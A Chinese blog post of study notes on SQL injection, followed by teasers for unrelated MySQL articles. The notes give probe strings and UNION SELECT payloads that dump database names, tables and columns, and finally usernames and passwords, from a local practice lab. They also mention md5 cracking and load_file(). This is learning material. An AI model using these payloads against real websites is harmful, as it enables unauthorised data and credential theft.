SQL注入

时间：2023-09-20 16:24:55浏览次数：42

标签：information name 数据库 SQL table 注入 select schema

sql注入就是在数据交互中，前端数据传到后台时没有做严格的判断，导致传进来的数据被拼接到sql语句中，被当作sql语句的一部分进行执行，从而导致数据泄露，丢失甚至服务器瘫痪。如果代码中没有过滤或者过滤不严谨是会出现漏洞的。

判断注入
and 1=1 正常
and 1=2 错误
可能存在注入，其实归根结底就是看我们的输入会不会对网站造成影响，即我们的操作有效

order by 默认是升序

在mysql5.0以上版本存在一个 information_schema的数据库，它记录着所有的数据库，表明，列名。

数据库中“.”代表下级
select * information_schema.tables;记录所有表名
where table_name=''筛选条件
select * from information_schema.columns;记录所有的列名
where column_name=''筛选条件
wherw table_schema=''筛选条件

信息收集

判断数据个数order by x 根据正确域错误的格式来判断个数，然后select 1,2,3,...
查询数据库 version()
数据库名字 databaase()
数据库用户 user()
操作系统 @@version_compile_os
127.0.0.1:8888/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata爆出所有数据库

127.0.0.1:8888/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'pikachu'获取特定数据库表名

127.0.0.1:8888/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu'获取特定数据库特定表列数据

http://127.0.0.1:8888/Less-2/?id=-1 union select 1,username,password from pikachu.users查询user的数据
md5解密等等

常见的load_file()读取的敏感信息

爆破

翻译

搜索

复制

标签：information,name,数据库,SQL,table,注入,select,schema
From： https://www.cnblogs.com/TinKode123/p/17717658.html

mysql 行级锁应用
当在MySQL中需要实现从scheduler_task表中选择一个status='todo'的任务，并将其状态设置为"ongoing"和worker_id设置为"1"，同时确保线程安全并返回该任务的信息时，我们需要使用行级锁来实现。介绍在多线程环境下，当多个线程同时执行数据库操作时，可能会出现并发冲突的情况。为了确保线......
Mysql中如何批量更新数据库中某个字段值中的部分内容；
在平时的开发过程中，偶尔会遇到需要批量更新数据库中某个字段值的部分内容，比如某个字段存储的是图片的URL路径，这个路径中的域名无法访问了，需要更新为另一个ip地址。Mysql中提供了REPLACE函数：可以使用了REPLACE函数来替换原来字段中的一部分数据为新值。UPDATEcar_data_hisSETc......
整理php防注入和XSS攻击通用过滤
对网站发动XSS攻击的方式有很多种，仅仅使用php的一些内置过滤函数是对付不了的，即使你将filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags这些函数都使用上了也不一定能保证绝对的安全。那么如何预防XSS注入？主要还是需要在用户数据过滤方面得考虑......
MySQL的字段数量以及长度限制
一、InnoDB行格式行格式紧凑的存储特性增强的可变长度列存储大型索引键前缀支持压缩支持支持的表空间类型REDUNDANTNNNNsystem,file-per-table,generalCOMPACTYNNNsystem,file-per-table,generalDYNAMICYYNNsystem,file-per-table,gener......
sql server 'IN' 拼接SQL 在C# 中匹配问题
varsql=@"selectdistincta.Empno,a.Alarmdate,l.Wdat,l.Empno,l.Empnm,l.Depno,l.Depnm,l.Clsno,l.Time1,l.Time2,l.Wtime1,l.Wtime2,l.Latet,l.Erat,l.Offtime,l.Memofrom......
mysqldump导出命令
导出数据备份数据[root@sf105113bin]#mysqldump-h127.0.0.1-P3306-uroot-p--add-locks-qdbname>dbname.sql//参数依次为:-h主机-p端口-u用户名-p密码--add-locks:导出过程中锁定表，完成后回解锁。-q：不缓冲查询，直接导出至标准输出2. ......
mysql数据库服务主从搭建
mysql数据库服务主从搭建1、搭建两台数据库服务环境，master，slave数据库搭建参考：https://www.cnblogs.com/zuouncle/p/17713806.html2、查看服务运行状态systemctlstatusmysqld 如果显示以下内容就关闭mysql服务重新启动 3、主库（master）配置配置mysql的启动配置......
Sql Server分组排序及生成序列号
1--1.分组排序2SELECT*,ROW_NUMBER()OVER(PARTITIONBY@fileName,@fileName1ORDERBYIDDESC)ASrowNumFROM@tableName34--2.生成序列号5SELECT*,ROW_NUMBER()over(orderbyidASC)ASrowNumFROM@tableName 翻译搜索复制......
postgresql的insert语句中进行判断，数据已有则更新，数据没有则插入
INSERT操作INSERTINTOtable_name(column1,column2,...)VALUES(value1,value2,...);下面是一个示例：INSERTINTOemployee(id,name,salary)VALUES(1,'JohnDoe',5000); INSERT或UPDATE操作在执行insert的时候进行判断，根据情况进行insert或者update操作，......
MySQL运行原理与基础架构
原始出处：http://harisxiong.blog.51cto.com/7513022/1351370 1.MySQL基础 MySQL是一个开放源代码的关系数据库管理系统。原开发者为瑞典的MySQLAB公司，最早是在2001年MySQL3.23进入到管理员的视野并在之后获得广泛的应用。 2008年MySQL公司被Sun公司收......

SQL注入

常见的load_file()读取的敏感信息

相关文章

赞助商

阅读排行